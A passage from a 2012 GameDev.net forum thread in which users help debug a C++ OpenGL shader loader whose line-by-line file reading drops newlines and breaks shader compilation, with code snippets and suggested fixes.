out of scope. The only things you need to free are things you explicitly new. That's the beauty of using C++ standard library functionality, rather than C or (as you are doing here) a bastard mix of C and C++. Now, I take it from the second part of your code that you need sProgram to be an array of pointers to C-style strings (for whatever reason). Rather than explicitly using new/delete you could do something like this (note that this is still somewhat C-ish, and there are other and more concise ways of doing it in straight C++; but now is not the time to introduce lambdas, I think ;) ): std::vector<const char *> sProgram; for(unsigned int i=0; i<sLines.size(); ++i) { sProgram.push_back(sLines[i].c_str()); } If you have C++11 you can then call sProgram.data() to get a pointer to the array of const char * held by sProgram, and use that wherever you are using your current sProgram pointer. If you don't have C++11, then the line &sProgram[0] works, though it is, of course, a bit hacky, (and the pointer is invalidated if you do another push_back that causes a reallocation, so be careful). This way, sProgram is also automatically managed (it grows as needed when more lines are added, and is automatically deleted when it goes out of scope) without the explicit new/delete calls. Even better would be to re-work whatever it is you need sProgram for so it doesn't require an array of C-style strings, but this might not always be possible if you are sending it to a third party library or API (such as a shader compiler, which I suspect you are doing). In this day and age, if you are using a C++ compiler and you are doing explicit allocating/de-allocating of arrays and strings, then you really ought to take a good hard look at what you are doing and why, as there are almost always safer ways to do it that don't require possibly unsafe memory management. Posted 26 December 2012 - 04:47 PM Ok i made changes and now same stuff happens only difference is now i can't complete the entire process. There is no error or anything the funtion returns false bool CShader::loadShader(string sFile, int a_iType) { //FILE* fp = fopen(sFile.c_str(), "rt"); //if(!fp)return false; // get all lines from a file vector<string> sLines; //char sLine[255]; //while(fgets(sLine, 255, fp))sLines.push_back(sLine); //fclose(fp); ifstream infile(sFile.c_str()); while(!infile.eof()) { string s; getline(infile, s); sLines.push_back(s); } infile.close(); //const char** sProgram = new const char*[ESZ(sLines)]; //FOR(i, ESZ(sLines))sProgram[i] = sLines[i].c_str(); //const char** sProgram = new const char* [(int)sLines.size()]; vector<const char *> sProgram; //for(int i; i < sLines.size(); i++) // sProgram[i] = sLines[i].c_str(); for(unsigned int i=0; i<sLines.size(); ++i) sProgram.push_back(sLines[i].c_str()); uiShader = glCreateShader(a_iType); glShaderSource(uiShader, sLines.size(), &sProgram[0], NULL); glCompileShader(uiShader); //delete[] sProgram; int iCompilationStatus; glGetShaderiv(uiShader, GL_COMPILE_STATUS, &iCompilationStatus); if(iCompilationStatus == GL_FALSE)return false; iType = a_iType; bLoaded = true; return 1; } What can cause glGetShaderiv(uiShader, GL_COMPILE_STATUS, &iCompilationStatus); to fail ? Shader files that i use with this are basic color shaders and they work with orginal function but now they fail to compile, I am not sure why exactly. Posted 26 December 2012 - 04:54 PM Per the manual page on glCompileShader you can call glGetShaderInfoLog to get some information on why the compile might have failed. Posted 26 December 2012 - 05:35 PM Well all I can get from glGetShaderInfoLog is '00B4A520' or similar ??? Posted 26 December 2012 - 05:41 PM Why don’t you show the code you are using to get said results? Also, your way of loading the shader is dreadful (why not just load the file into memory, add a 0 at the end, and pass that directly to ::glShaderSource() instead of wasting time creating an array of char *’s?), but I don’t see any bugs in it. So why not save a reply and also post the shader code since that seems more likely to be the source of the error? L. Spiro Edited by L. Spiro, 26 December 2012 - 05:45 PM. My Art: My Music: L. Spiro Engine: L. Spiro Engine Forums: Posted 26 December 2012 - 06:10 PM Why do you guys load shader sources line by line? Thats a extra runtime. Shader sources aren't very big, everything can be done with one read: GLuint ShaderLoader::shaderFromFile(const std::string& name, GLenum type) { std::fstream file(name.c_str(), std::ios::binary | std::ios::in); if (!file.good()) { Logger::getInstance().log(Logger::LOG_ERROR, "Cannot open file %s", name.c_str()); return 0; } file.seekg(0, std::ios::end); int sourceLength = file.tellg(); GLchar* shaderSource = new GLchar[sourceLength + 1]; file.seekg(0, std::ios::beg); file.read(shaderSource, sourceLength); shaderSource[sourceLength] = 0; GLuint shader = glCreateShader(type); glShaderSource(shader, 1, (const GLchar**)&shaderSource, NULL); glCompileShader(shader); delete[] shaderSource; GLint compileStatus; glGetShaderiv(shader, GL_COMPILE_STATUS, &compileStatus); if (compileStatus == GL_FALSE) { GLint infoLogLength; glGetShaderiv(shader, GL_INFO_LOG_LENGTH, &infoLogLength); GLchar* infoLog = new GLchar[infoLogLength + 1]; glGetShaderInfoLog(shader, infoLogLength, NULL, infoLog); Logger::getInstance().log(Logger::LOG_ERROR, "In file %s: %s", name.c_str(), infoLog); delete[] infoLog; } return shader; } Edited by santa01, 26 December 2012 - 06:12 PM. Posted 26 December 2012 - 07:23 PM So why not save a reply and also post the shader code since that seems more likely to be the source of the error? Shaders are working in first version of the function vertex shader: #version 330 layout (location = 0) in vec3 inPosition; layout (location = 1) in vec3 inColor; smooth out vec3 theColor; void main() { gl_Position = vec4(inPosition, 1.0); theColor = inColor; } fragment shader #version 330 smooth in vec3 theColor; out vec4 outputColor; void main() { outputColor = vec4(theColor, 1.0); } these are loaded with // Load shaders and create shader program shVertex.loadShader("data/shaders/color.vert", GL_VERTEX_SHADER); shFragment.loadShader("data/shaders/color.frag", GL_FRAGMENT_SHADER); Posted 26 December 2012 - 08:10 PM Well all I can get from glGetShaderInfoLog is '00B4A520' or similar ??? Why don’t you show the code you are using to get said results? My Art: My Music: L. Spiro Engine: L. Spiro Engine Forums: Posted 26 December 2012 - 09:49 PM What L. Spiro is saying, in case it's not obvious, is that you're not showing how you're getting this error log back... Your earlier post shows some good info on how you're compiling your shader, but it doesn't show how you're obtaining that strange error log. It's kinda like trying to diagnose a patient, if you're a doctor, and he says "I have symptoms" but doesn't say what those symptoms are Edited by Cornstalks, 26 December 2012 - 10:00 PM. Posted 27 December 2012 - 09:17 AM glShaderSource(uiShader, sLines.size(), &sProgram[0], NULL); glCompileShader(uiShader); int infologLength; int maxLength; char* infoLog; glGetShaderiv(uiShader,GL_INFO_LOG_LENGTH, &maxLength); glGetShaderInfoLog(uiShader, maxLength, &infologLength, infoLog); ofstream outfile; outfile.open ("log.txt"); outfile << &infoLog << endl; outfile.close(); Posted 27 December 2012 - 09:27 AM Santa01 showed above how to get the log from the shader or program object. Your code has two major problems though: Posted 27 December 2012 - 09:44 AM finally, so the errors are this Fragment shader failed to compile with the following errors: ERROR: 2:1: error(#307) Profile "smooth" is not supported ERROR: 2:1: error(#76) Syntax error: unexpected tokens following #version ERROR: error(#273) 2 compilation errors. No code generated any ideas? Posted 27 December 2012 - 10:23 AM getline(infile, s);should be: getline(infile, s); s.append( endl );I had assumed originally that ::glShaderSource() would treat each line you passed to it as…a line. Edited by L. Spiro, 27 December 2012 - 10:36 AM. My Art: My Music: L. Spiro Engine: L. Spiro Engine Forums:
http://www.gamedev.net/topic/636345-how-to-avoid-macro-loops/
CC-MAIN-2015-14
refinedweb
1,888
64.41
I don't write much code these days and felt it was time to sharpen the saw. I have a need to download a ton of images from a site (I got permission first...) but it is going to take forever to do by hand. Even though there are tons of tools out there for image crawling I figured this would be a great exercise to brush up on some skills and delve further into a language I am still fairly new to, Ruby. This allows me to use basic language constructs, network IO, and file IO, all while getting all the images I need in a fast manner. As I have mentioned a few times on this blog, I am still new to Ruby so any advice for how to make this code cleaner is appreciated. You can download the file here. Here is the source: require 'net/http' require 'uri' class Crawler # This is the domain or domain and path we are going # to crawl. This will be the starting point for our # efforts but will also be used in conjunction with # the allow_leave_site flag to determine whether the # page can be crawled or not. attr_accessor :domain # This flag determines whether the crawler will be # allowed to leave the root domain or not. attr_accessor :allow_leave_site # This is the path where all images will be saved. attr_accessor :save_path # This is a list of extensions to skip over while # crawling through links on the site. attr_accessor : omit_extensions # Remove the space between : and o - it makes a smiley here.... # This keeps track of all the pages we have visited # so we don't visit them more than once. attr_accessor :visited_pages # This keeps track of all the images we have downloaded # so we don't download them more than once. attr_accessor :downloaded_images def begin_crawl if domain.nil? || domain.length < 4 || domain[0, 4] != "http" @domain = "{domain}" end crawl(domain) end private def initialize @domain = "" @allow_leave_site = false @save_path = "" @omit_extensions = [] @visited_pages = [] @downloaded_images = [] end def crawl(url = nil) # If the URL is empty or nil we can move on. return if url.nil? || url.empty? # If the allow_leave_site flag is set to false we # want to make sure that the URL we are about to # crawl is within the domain. return if !allow_leave_site && (url.length < domain.length || url[0, domain.length] != domain) # Check to see if we have crawled this page already. # If so, move on. return if visited_pages.include? url puts "Fetching page: #{url}" # Go get the page and note it so we don't visit it again. res = fetch_page(url) visited_pages << url # If the response is nil then we cannot continue. Move on. return if res.nil? # Some links will be relative so we need to grab the # document root. root = parse_page_root(url) # Parge the image and anchor tags out of the result. images, links = parse_page(res.body) # Process the images and links accordingly. handle_images(root, images) handle_links(root, links) end def parse_page_root(url) end_slash = url.rindex("/") if end_slash > 8 url[0, url.rindex("/")] + "/" else url + "/" end end def handle_images(root, images) if !images.nil? images.each {|i| # Make sure all single quotes are replaced with double quotes. # Since we aren't rendering javascript we don't really care # if this breaks something. i.gsub!("'", "\"") # Grab everything between src=" and ". src = i.scan(/src=[\"\']([^\"\']+)/)[0][0] # If the src is empty move on. next if src.nil? || src.empty? # If we don't have an absolute path already, let's make one. if !root.nil? && src[0,4] != "http" src = root + src end save_image(src) } end end def save_image(url) # Check to see if we have saved this image already. # If so, move on. return if downloaded_images.include? url puts "Saving image: #{url}" # Save this file name down so that we don't download # it again in the future. downloaded_images << url # Parse the image name out of the url. We'll use that # name to save it down. file_name = parse_file_name(url) while File.exist?(save_path + "\\" + file_name) file_name = "_" + file_name end # Get the response and data from the web for this image. response = Net::HTTP.get_response(URI.parse(url)) File.open(save_path + "\\" + file_name, "wb+") do |f| f << response.body end end def parse_file_name(url) # Find the position of the last slash. Everything after # it is our file name. spos = url.rindex("/") url[spos + 1, url.length - 1] end def handle_links(root, links) if !links.nil? links.each {|l| # Make sure all single quotes are replaced with double quotes. # Since we aren't rendering javascript we don't really care # if this breaks something. l.gsub!("'", "\"") # Grab everything between href=" and ". href = l.scan(/(\href+)="([^"\\]*(\\.[^"\\]*)*)"/)[0][1] # We don't want to follow mailto or empty links next if href.nil? || href.empty? || (href.length > 6 && href[0,6] == "mailto") # If we don't have an absolute path already, let's make one. if !root.nil? && href[0,4] != "http" href = root + href end # Down the rabbit hole we go... crawl(href) } end end def parse_page(html) # Start with all lowercase to ensure we don't have any # case sensitivity issues. html.downcase! images = html.scan(/]*>/) links = html.scan(/]*>/) return [ images, links ] end def fetch_page(url, limit = 10) # Make sure we are supposed to fetch this type of resource. return if should_omit_extension(url) # You should choose better exception. raise ArgumentError, 'HTTP redirect too deep' if limit == 0 response = Net::HTTP.get_response(URI.parse(url)) case response when Net::HTTPSuccess then response when Net::HTTPNotFound then nil when Net::HTTPRedirection then fetch_page(response['location'], limit - 1) else response.error! end end def should_omit_extension(url) # Get the index of the last slash. spos = url.rindex("/") # Get the index of the last dot. dpos = url.rindex(".") # If the last dot is before the last slash, we don't have # an extension and can return. return false if spos > dpos # Grab the extension. ext = url[dpos + 1, url.length - 1] # The return value is whether or not the extension we # have for this URL is in the omit list or not. omit_extensions.include? ext end end crawler = Crawler.new crawler.save_path = "C:\\Users\\jmcdonald\\Desktop\\CrawlerOutput" crawler.omit_extensions = [ "doc", "pdf", "xls", "rtf", "docx", "xlsx", "ppt", "pptx", "avi", "wmv", "wma", "mp3", "mp4", "pps", "swf" ] crawler.domain = "" crawler.allow_leave_site = false crawler.begin_crawl {{ parent.title || parent.header.title}} {{ parent.tldr }} {{ parent.linkDescription }}{{ parent.urlSource.name }}
https://dzone.com/articles/ruby-based-image-crawler
CC-MAIN-2017-39
refinedweb
1,053
75.91
Greetings, I’m running into an odd problem here. Everything was working fine until I started playing with my application this morning. It seems that when I try to use my login action, I’m instead given this error. Only get, put, and delete requests are allowed This happens only after I submit the form. The login page is displayed fine when it’s displayed using the GET method. Here is my controller code: def login session[:member_id] = nil if request.post? member = Member.authenticate(params[:username], params[:password]) if member session[:member_id] = member.id flash[:notice] = “You have successfully logged in!” redirect_to stories_path else flash.now[:notice] = “Invalid username/password combination” end end end None of the code runs from within the ‘if request.post?’ block. I removed the code and simply added a redirect_to to see what would happen, and the error still persists. At the bottom of the error page, it says: {“cookie”=>[], “Cache-Control”=>“no-cache”, “Allow”=>“GET, PUT, DELETE”} Is there a way to edit this to allow POST as well? I’ve read on the Internet that moving your route high in the file will help, it didn’t. My rout looks like: map.resources :members, :collection => { :login => :get, :logout => :get } From day one, I’ve had this error message pop up often. It seemed to do so after editing my routes. A simple reboot of my server resolved the problem on these occasions - it’s not helping here. Any help would be appreciated. I’ve already played with this for a few hours with no luck. Thanks for your time! ~Dustin T.
https://www.ruby-forum.com/t/only-get-put-and-delete-requests-are-allowed/144634
CC-MAIN-2021-43
refinedweb
269
67.55
I already posted a topic on this but have considerably (and that topic was put on hold..so I can't edit) changed my code (I tried what one of the users said in different variations, but no beans). I've tried running just toMorse, but although it compiles I get no output and an error message of 'java.lang.ArrayIndexOutOfBoundsException(at projmorsejava:22 and 46)' import java.util.Scanner; public class ProjMorse { public static void main(String[] args) { Scanner input = new Scanner(System.in); String[] alpha = { "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "1", "2", "3", "4", "5", "6", "7", "8", "9", "0", " " }; String[] dottie = { ".-", "-...", "-.-.", "-..", ".", "..-.", "--.", "....", "..", ".---", "-.-", ".-..", "--", "-.", "---", ".--.", "--.-", ".-.", "...", "-", "..-", "...-", ".--", "-..-", "-.--", "--..", ".----", "..---", "...--", "....-", ".....", "-....", "--...", "---..", "----.", "-----", "|" }; System.out .println("Enter English to convert from English or Morse to convert from Morse:"); String ans = input.nextLine(); if (ans.equals("English")) { System.out.println("Please enter the text you would like to convert to Morse Code: "); String english = input.nextLine(); char[] translates = (english.toLowerCase()).toCharArray(); System.out.println(toMorse(translates, dottie)); //calls on method toMorse } else if (ans.equals("Morse")) { System.out .println("Please enter the text you would like to convert to English (separate words with '|'):"); String code = input.nextLine(); String[] translates = (code.split("[|]", 0)); System.out.println(toEnglish(translates, alpha));//calls on method toEnglish } else System.out.println("Invalid input, please try again."); } public static String toMorse(char [] translates, String [] dottie) { String morse = ""; for (int j = 0; j < translates.length; j++) { char a = translates[j]; if(Character.isLetter(a)) { morse = dottie[a + 'a']; } } return morse;/*so I tried running only this(commented other stuff out) and it compiled but although it ran it didnt translate */ } public static String toEnglish(String [] translates, String [] alpha) { String s; for (int n = 0; n < translates.length; n++) { String a = translates[n]; s = java.util.Arrays.asList(alpha).(Character.toChars(a + 'a')[0]);//I'm not sure what to do here.. } return s; } } There are several things that do not work: public class ...(I suspect a copy-paste error) import java.util.Scanner;since you use Scanner toMorse: first, two args are expected (check the method signature); then, first argument's name is not morse(unknown symbol), it must be translates, which you have just "created"! About the second: you need the array of strings that has in place of the e.g. "e" the morse code, so second argument must be... dottie toEnglish: two args required (check the method signature, as done before!); the first, has to be translates, again (unknown s, as morsebefore)! About second argument: see above but of course since you have morse in input, you need the other array. toMorseyou pick each char using translates[j], not valueOf. toEnglishyou get the string using translates[n] toEnglishand toMorse, you have to "accumulate" the converted string into a string, and return it at the end, i.e. outside the loops! .charAt(0): to perform an op like x - 'a'x can't be a string, so since you have a string, you must get its first char. morseand s: variable names in a method has nothing to do with variable names in the caller! Example for toMorse: String morse = ""; for (int j = 0; j < translates.length; j++) { char a = translates[j]; if(Character.isLetter(a)) { morse += dottie[a - 'a']; } } return morse; // this symbol is unknown to the caller You will call it with something as simple as System.out.println(toMorse(translates, dottie)); The fix for toEnglish is very similar (though your original code won't work), I hope you can do it by yourself. I think is all, more or less. For each string you have in your translates array, you have to search into dottie string array in order to search for that particular sequence of dots and lines. If you find it, the position (index) you find it at, it's also the index of the right letter you keep in the alpha array. So you might need to add that array as argument and use the index to pick the letter. Or, rather, you can use the same "trick" you used to toMorse and keep the toEnglish method signature unchanged: once you have the index, since you have found it, you can "invert" the coding algorithm, so you have to add 'a' to that index (integer) to obtain the code for the letter. You can use something like Character.toChars(k + 'a')[0] to take the char you want to add to the "accumulation string", being k the index. The cumbersome notation Character.toChars(k + 'a')[0] is since indeed Character.toChars returns an array, so we pick the first element of that array, which is the char we need.
https://codedump.io/share/1jrnViWYE5bn/1/morse-code-converter
CC-MAIN-2016-44
refinedweb
791
65.22
Gtk2::api - Mapping the Gtk+ C API to perl The Gtk2 module attempts to stick as close as is reasonable to the C API, to minimize the need to maintain documentation which is nearly a copy of the C API reference documentation. However, the world is not perfect, and the mappings between C and perl are not as clean and predictable as you might wish. Thus, this page described the basics of how to map the C API to the perl API, and lists various points in the API which follow neither the C API documentation nor the mapping principles. The canonical documentation is the C API reference at and There are two main sections: 'BINDING BASICS' describes the principles on which the bindings work; understanding these can lead you to guess the proper syntax to use for any given function described in the C API reference. The second section lists various specific points of difference which don't necessarily correspond with what you expect; this section is in three main parts: missing methods, renamed methods, and different call signatures. We avoid deprecated APIs. Many functions refer to C concepts which are alien to the bindings. Many things have replacements. Things that were marked as deprecated at gtk+ 2.0.0 do not appear in the bindings. This means that gtk+-1.x's GtkCList, GtkTree, and GtkText are not available. The notable exception is GtkList, which is available solely in support of GtkCombo (which was itself replaced by GtkComboBox in 2.4); it should not be used under any other circumstances. If you really need access to these old widgets, search the web for Gtk2::Deprecated. Some other things were deprecated during the gtk+ 2.x series, e.g. GtkOptionMenu was deprecated in favor of GtkComboBox in 2.4. Things that were marked as deprecated during the 2.x series will not be removed, basically because older versions do not have the replacements, and removing them would break backward compatibility. The namespaces of the C libraries are mapped to perl packages according to scope, although in some cases the distinction may seem rather arbitrary: g_ => Glib (the Glib module - distributed separately) gtk_ => Gtk2 gdk_ => Gtk2::Gdk gdk_pixbuf_ => Gtk2::Gdk::Pixbuf pango_ => Gtk2::Pango Objects get their own namespaces, in a way, as the concept of the GType is completely replaced in the perl bindings by the perl package name. This goes for GBoxed, GObject, and even things like Glib::String and Glib::Int (which are needed for specifying column types in the Gtk2::TreeModel). (Flags and enums are special -- see below.) GtkButton => Gtk2::Button GdkPixbuf => Gtk2::Gdk::Pixbuf GtkScrolledWindow => Gtk2::ScrolledWindow PangoFontDescription => Gtk2::Pango::FontDescription With this package mapping and perl's built-in method lookup, the bindings can do object casting for you. This gives us a rather comfortably object-oriented syntax, using normal perl syntax semantics: in C: GtkWidget * b; b = gtk_check_button_new_with_mnemonic ("_Something"); gtk_toggle_button_set_active (GTK_TOGGLE_BUTTON (b), TRUE); gtk_widget_show (b); in perl: my $b = Gtk2::CheckButton->new ('_Something'); $b->set_active (1); $b->show; You see from this that constructors for most widgets which allow mnemonics will use mnemonics by default in their "new" methods. For those who don't guess this right off, Gtk2::Button->new_with_mnemonic is also available. Cast macros are not necessary, and your code is a lot shorter. Constants are handled as strings, because it's much more readable than numbers, and because it's automagical thanks to the GType system. Constants are referred to by their nicknames; basically, strip the common prefix, lower-case it, and optionally convert '_' to '-': GTK_WINDOW_TOPLEVEL => 'toplevel' GTK_BUTTONS_OK_CANCEL => 'ok-cancel' (or 'ok_cancel') Flags are a special case. You can't (sensibly) bitwise-or these string-constants, so you provide a reference to an array of them instead. Anonymous arrays are useful here, and an empty anonymous array is a simple way to say 'no flags'. FOO_BAR_BAZ | FOO_BAR_QUU | FOO_BAR_QUUX => [qw/baz quu qux/] 0 => [] In some cases you need to see if a bit is set in a bitfield; methods returning flags therefore return an overloaded object. See Glib for more details on which operations are allowed on these flag objects, but here is a quick example: in C: /* event->state is a bitfield */ if (event->state & GDK_CONTROL_MASK) g_printerr ("control was down\n"); in perl: # $event->state is a special object warn "control was down\n" if $event->state & "control-mask"; But this also works: warn "control was down\n" if $event->state * "control-mask"; warn "control was down\n" if $event->state >= "control-mask"; warn "control and shift were down\n" if $event->state >= ["control-mask", "shift-mask"]; And treating it as an array of strings (as in older versions) is still supported: warn "control was down\n" if grep /control-mask/, @{ $event->state }; The gtk stock item stuff is a little different -- the GTK_STOCK_* constants are actually macros which evaluate to strings, so they aren't handled by the mechanism described above; you just specify the string, e.g., GTK_STOCK_OK => 'gtk-ok'. The full list of stock items can be found at The functions for ref'ing and unref'ing objects and free'ing boxed structures are not even mapped to perl, because it's all handled automagically by the bindings. I could write a treatise on how we're handling reference counts and object lifetimes, but all you need to know as perl developer is that it's handled for you, and the object will be alive so long as you have a perl scalar pointing to it or the object is referenced in another way, e.g. from a container. The only thing you have to be careful about is the lifespan of non reference counted structures, which means most things derived from Glib::Boxed. If it comes from a signal callback it might be good only until you return, or if it's the insides of another object then it might be good only while that object lives. If in doubt you can copy. Structs from copy or new are yours and live as long as referred to from Perl. Use normal perl callback/closure tricks with callbacks. The most common use you'll have for callbacks is with the Glib signal_connect method: $widget->signal_connect (event => \&event_handler, $user_data); $button->signal_connect (clicked => sub { warn "hi!\n" }); $user_data is optional, and with perl closures you don't often need it (see "Persistent variables with closures" in perlsub). The userdata is held in a scalar, initialized from what you give in signal_connect etc. It's passed to the callback in usual Perl "call by reference" style which means the callback can modify its last argument, ie. $_[-1], to modify the held userdata. This is a little subtle, but you can use it for some "state" associated with the connection. $widget->signal_connect (activate => \&my_func, 1); sub my_func { print "activation count: $_[-1]\n"; $_[-1] ++; } Because the held userdata is a new scalar there's no change to the variable (etc) you originally passed to signal_connect. If you have a parent object in the userdata (or closure) you have to be careful about circular references preventing parent and child being destroyed. See "Two-Phased Garbage Collection" in perlobj about this generally. In Gtk2-Perl toplevel widgets like Gtk2::Window always need an explicit $widget->destroy so their destroy signal is a good place to break circular references. But for other widgets it's usually friendliest to avoid circularities in the first place, either by using weak references in the userdata, or possibly locating a parent dynamically with $widget->get_ancestor. A major change from gtk-perl (the bindings for Gtk+-1.x) is that callbacks take their arguments in the order proscribed by the C documentation, and only one value is available for user data. gtk-perl allowed you to pass multiple values for user_data, and always brought in the user_data immediately after the instance reference; this proved to be rather confusing, and did not follow the C API reference, so we decided not to do that for gtk2-perl. In C you can only return one value from a function, and it is a common practice to modify pointers passed in to simulate returning multiple values. In perl, you can return lists; any functions which modify arguments have been changed to return them instead. A common idiom in gtk is returning gboolean, and modifying several arguments if the function returns TRUE; for such functions, the perl wrapper just returns an empty list on failure. in C: foo_get_baz_and_quux (foo, &baz, &quux); in perl: ($baz, $quux) = $foo->get_baz_and_quux; Most things that take or return a GList, GSList, or array of values will use native perl arrays (or the argument stack) instead. You don't need to specify string lengths, although string length parameters should still be available for functions dealing with binary strings. You can always use substr to pass different parts of a string. Anything that uses GError in C will croak on failure, setting $@ to a magical exception object, which is overloaded to print as the returned error message. The ideology here is that GError is to be used for runtime exceptions, and croak is how you do that in perl. You can catch a croak very easily by wrapping the function in an eval: eval { my $pixbuf = Gtk2::Gdk::Pixbuf->new_from_file ($filename); $image->set_from_pixbuf ($pixbuf); }; if ($@) { print "$@\n"; # prints the possibly-localized error message if (Glib::Error::matches ($@, 'Gtk2::Gdk::Pixbuf::Error', 'unknown-format')) { change_format_and_try_again (); } elsif (Glib::Error::matches ($@, 'Glib::File::Error', 'noent')) { change_source_dir_and_try_again (); } else { # don't know how to handle this die $@; } } This has the added advantage of letting you bunch things together as you would with a try/throw/catch block in C++ -- you get cleaner code. By using Glib::Error exception objects, you don't have to rely on string matching on a possibly localized error message; you can match errors by explicit and predictable conditions. See Glib::Error for more information. The bindings do automatic memory management. You should never need to use these. The gtk_* functions are deprecated in favor of the g_* ones. Gtk2::Helper has a wrapper for Glib::IO->add_watch which makes it behave more like gtk_input_add. Because of the use of Perl subroutine references in place of GClosures, there is no way to preserve at the Perl level the one-to-one mapping between GtkAccelGroups and GClosures. Without that mapping, this function is useless. Avoid a clash with $gobject->set. As a general rule function that take a pair of parameters, a list and the number of elements in that list, will normally omit the number of elements and just accept a variable number of arguments that will be converted into the list and number of elements. In many instances parameters have been reordered so that this will work. See below for exceptions and specific cases that are not detailed in the generated Perl API reference. These classes were incorrectly written with a capital B in version 1.00 and below. They have been renamed in version 1.01 and the old way to write them is deprecated, but supported. The n_entries parameter has been ommited and callback_data is accepted as the first parameter. All parameters after that are considered to be entries. Position and items parameters flipped order so that an open ended parameter list could be used. $list->insert_items($position, $item1, $item2, ...) (Note that GtkList and GtkListItem are deprecated and only included because GtkCombo still makes use of them, they are subject to removal at any point so you should not utilize them unless absolutely necessary.) versions of these functions do not do this. Where a GClosure is wanted by the C stuff, a perl subroutine reference suffices. However, because of this, there are a few subtle differences in sematics.); The canonical documentation is the C API reference at and Gtk2 includes a full suite of automatically-generated API reference POD for the Perl API -- see Gtk2::index for the starting point. There should be a similar document for Glib --- link to it here when it exists. muppet <scott at asofyet dot org> Copyright (C) 2003, 2009.
http://search.cpan.org/dist/Gtk2/lib/Gtk2/api.pod
CC-MAIN-2017-04
refinedweb
2,021
58.92
When experiencing unexpected behavior with Datadog APM, there are a few common issues you can look for before reaching out to Datadog support: Make sure the Agent has APM enabled: Run the following command on the Agent host: netstat -anp | grep 8126. If you don’t see an entry, then the Agent is not listening on port 8126, which usually means either that the Agent is not running or that APM is not enabled in your datadog.yaml file. See the APM Agent setup documentation for more information. Ensure that the Agent is functioning properly: In some cases the Agent may have issues sending traces to Datadog. Enable Agent debug mode and check the Trace Agent logs to see if there are any errors. Verify that your tracer is running correctly: After having enabled tracer debug mode, check your Agent logs to see if there is more info about your issue. If there are errors that you don’t understand, or traces are reported to be flushed to Datadog and you still cannot see them in the Datadog UI, contact Datadog support and provide the relevant log entries with a flare. Datadog debug settings are used to diagnose issues or audit trace data. Enabling debug mode in production systems is not recommended, as it increases the number of events that are sent to your loggers. Use it sparingly, for debugging purposes only. Debug mode is disabled by default. To enable it, follow the corresponding language tracer instructions: To enable debug mode for the Datadog Java Tracer, set the flag -Ddatadog.slf4j.simpleLogger.defaultLogLevel=debug when starting the JVM. Note: Datadog Java Tracer implements SL4J SimpleLogger. As such, all of its settings can be applied like logging to a dedicated log file: -Ddatadog.slf4j.simpleLogger.logFile=<NEW_LOG_FILE_PATH> To enable debug mode for the Datadog Python Tracer, set the environment variable DATADOG_TRACE_DEBUG=true when using ddtrace-run. To enable debug mode for the Datadog Ruby Tracer, set the debug option to true in the tracer initialization configuration: Datadog.configure do |c| c.tracer debug: true end Application Logs: By default, all logs are processed by the default Ruby logger. When using Rails, you should see the messages in your application log file. Datadog client log messages are marked with [ddtrace], so you can isolate them from other messages. Additionally, it is possible to override the default logger and replace it with a custom one. This is done using the log attribute of the tracer. f = File.new("<FILENAME>.log", "w+") # Log messages should go there Datadog.configure do |c| c.tracer log: Logger.new(f) # Overriding the default tracer end Datadog::Tracer.log.info { "this is typically called by tracing code" } See the API documentation for more details. To enable debug mode for the Datadog Go Tracer, enable the debug mode during the Start config: package main import "gopkg.in/DataDog/dd-trace-go.v1/ddtrace/tracer" func main() { tracer.Start(tracer.WithDebugMode(true)) defer tracer.Stop() } To enable debug mode for the Datadog Node.js Tracer, enable it during its init: const tracer = require('dd-trace').init({ debug: true }) Application Logs: By default, logging from this library is disabled. In order to get debbuging debug() and error() methods that can handle messages and errors, respectively. For example: const bunyan = require('bunyan') const logger = bunyan.createLogger({ name: 'dd-trace', level: 'trace' }) const tracer = require('dd-trace').init({ logger: { debug: message => logger.trace(message), error: err => logger.error(err) }, debug: true }) Then check the Agent logs to see if there is more info about your issue: If the trace was sent to the Agent properly, you should see Response from the Agent: OK log entries. This indicates that the tracer is working properly, therefore the problem may be with the Agent itself. Refer to the Agent troubleshooting guide for more information. If an error was reported by the Agent (or the Agent could not be reached), you will see Error from the Agent log entries. In this case, validate your network configuration to ensure the Agent can be reached. If you are confident the network is functional and that the error is coming from the Agent, refer to the Agent troubleshooting guide. If neither of these log entries is present, then no request was sent to the Agent, which means that the tracer is not instrumenting your application. In this case, contact Datadog support and provide the relevant log entries with a flare. For more tracer settings, check out the API documentation. To enable debug mode for the Datadog .NET Tracer, set the isDebugEnabled argument to true when creating a new tracer instance: using Datadog.Trace; var tracer = Tracer.Create(isDebugEnabled: true); // optional: set the new tracer as the new default/global tracer Tracer.Instance = tracer; To enable debug mode for the Datadog PHP Tracer, set the environment variable DD_TRACE_DEBUG=true. See the PHP configuration docs for details about how and when this environment variable value should be set in order to be properly handled by the tracer. In order to tell PHP where it should put error_log messages, you can either set it at the server level, or as a PHP ini parameter, which is the standard way to configure PHP behavior. If you are using an Apache server, use the ErrorLog directive. If you are using an NGINX server, use the error_log directive. If you are configuring instead at the PHP level, use PHP’s error_log ini parameter. The release binary libraries are all compiled with debug symbols added to the optimized release. It is possible to use gdb or lldb to debug the library and to read core dumps. If you are building the library from source, pass the argument -DCMAKE_BUILD_TYPE=RelWithDebInfo to cmake to compile an optimized build with debug symbols. cd .build cmake -DCMAKE_BUILD_TYPE=RelWithDebInfo .. make make install Additional helpful documentation, links, and articles:
https://docs.datadoghq.com/tracing/troubleshooting/
CC-MAIN-2019-26
refinedweb
976
56.76
I am following your directions on this link. I am using a Grove Base hat and a Raspberry Pi. I have followed the directions exactly but I always get an error message when I Import Seeed_SGP30. Traceback (most recent call last): File “test”, line 1, in import seeed_sgp30 File “/home/pi/.local/lib/python3.7/site-packages/seeed_sgp30.py”, line 1, in from sgp30 import Sgp30 File “/usr/local/lib/python3.7/dist-packages/sgp30/init.py”, line 1, in from .sgp30 import Sgp30 File “/usr/local/lib/python3.7/dist-packages/sgp30/sgp30.py”, line 2, in from smbus2 import SMBusWrapper, SMBus, i2c_msg After looking at documentation for the smbus2 that this code uses it does not look like there is a SMBusWrapper for the smbus2. I am unable to edit this out of the code. What should I do?
https://forum.seeedstudio.com/t/grove-sgp30-issues/255854
CC-MAIN-2022-05
refinedweb
141
59.9
